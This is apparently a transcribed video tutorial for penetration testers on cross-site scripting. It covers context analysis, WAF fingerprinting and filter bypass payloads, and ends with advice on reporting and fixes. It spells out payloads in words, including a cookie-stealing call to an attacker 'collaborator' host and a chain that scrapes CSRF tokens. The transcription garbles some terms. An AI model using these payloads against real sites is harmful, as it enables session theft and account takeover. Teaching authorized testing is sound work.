Day 13 of 60, and today we kill the alert box. If you can pop alert 1 in a lab but freeze the second the input gets sanitized, or the context isn't plain HTML, this one's for you. Real cross-site scripting work isn't pasting payloads from a cheat sheet. It's reading the context, fingerprinting the filter, and proving impact a developer can't ignore. Here's the scenario. You found a reflected XSS on a login redirect parameter, and the client's WAF is blocking every payload you throw. Let's break it open. First rule: context decides everything. The same input lands differently depending on where it echoes. Inside HTML body, you need a tag. Inside an attribute, you break out with a quote. Inside a JavaScript string like var redirect equals your underscore input, you don't need a single tag, you escape the string. Open DevTools, search the response for your canary, and look at exactly what surrounds it. Reflected, stored, or DOM-based. For DOM bugs, trace the source, like location.hash, straight to the sink, like inner HTML. Find the sink before you write a single payload. Now fingerprint the WAF, don't brute force it. Send safe canaries and watch the response diff. Try a bare script tag, blocked, 403. Try the word honorer alone, passes. Try JavaScript as a string, blocked. Try alert, passes, but alert gets flagged. Each probe tells you what the filter pattern actually matches. You're not guessing payloads, you're mapping a block list. 2 minutes of canaries saves you 20 minutes of blind retries, and it gives you the exact rule to step around. Time to bypass. Script tag is dead, so pivot to an event handler that doesn't need it. The classic, img src equals x honorer equals alert, document.domain. No script, fires on a broken image load. WAF still catching honorer? Go svg, svg onload equals alert, document.domain. Still blocked? Drop into a URL scheme, JavaScript, fetch, inside and ref the page renders. For that JavaScript string context, you don't even need a tag, send, alert, document.domain, / to close the string, run your code, and comment out the rest. Match the breakout to the context you already identified. But here's where juniors stop and seniors keep going. Alert, document.domain, proves execution, it does not prove impact, and a real report needs impact. So weaponize it. Swap the alert for an exfil call, new image, .src equals https / your collaborator /c plus document.cookie. Now you're stealing the session cookie to an attacker-controlled callback. If the cookie is HTTP only, escalate, read the CSRF token straight out of the DOM, then fire a silent authenticated post, fetch the page, scrape the token, submit the protected form as the victim. That's XSS chained into a CSRF bypass. That chain is the whole game for severity. A reflected alert on a marketing page is a medium, annoying, low blast radius. The exact same bug firing in an admin panel, stealing a live session, or auto-submitting a privileged action. That's a critical. CVSS rewards impact and scope, not cleverness. Stored XSS that hits every authenticated user who loads a comment is worse than reflected that needs a crafted link. Before you write the payload, ask, who runs it, what session do I get, and what can that session do? The report is the deliverable, the payload is just the proof. Write the findings so a developer fixes it without a meeting. Title the context precisely, reflected XSS in redirect_URI, JavaScript string context. Reproduction steps, numbered, copy-pastable, the exact request, the exact payload, the observed result. Include the working POC that captures a token, not a screenshot of alert 1. Engagement reports get pushback on alert 1 because it doesn't demonstrate harm. Then the fix: context-aware output encoding, a content security policy, and HTTP only plus same site on the session cookie. Give them the patch, not just the panic. Build yourself a decision tree you can run in the field without a cheat sheet. Where does my input land? HTML body, inject a tag. Attribute, break out with a quote, then an event handler. JavaScript string, escape the quote and comment the tail. Template literal, close with a backtick and a dollar brace. URL sync, try the JavaScript scheme. Context first, payload second, every single time. That's the muscle that survives sanitization. Day 13 done. The takeaway: XSS severity lives in the context and the chain, not the payload. Identify the context, fingerprint the filter, prove real impact, and write the findings so it actually gets fixed. The report is the deliverable, the payload is just the proof. Subscribe for day 14.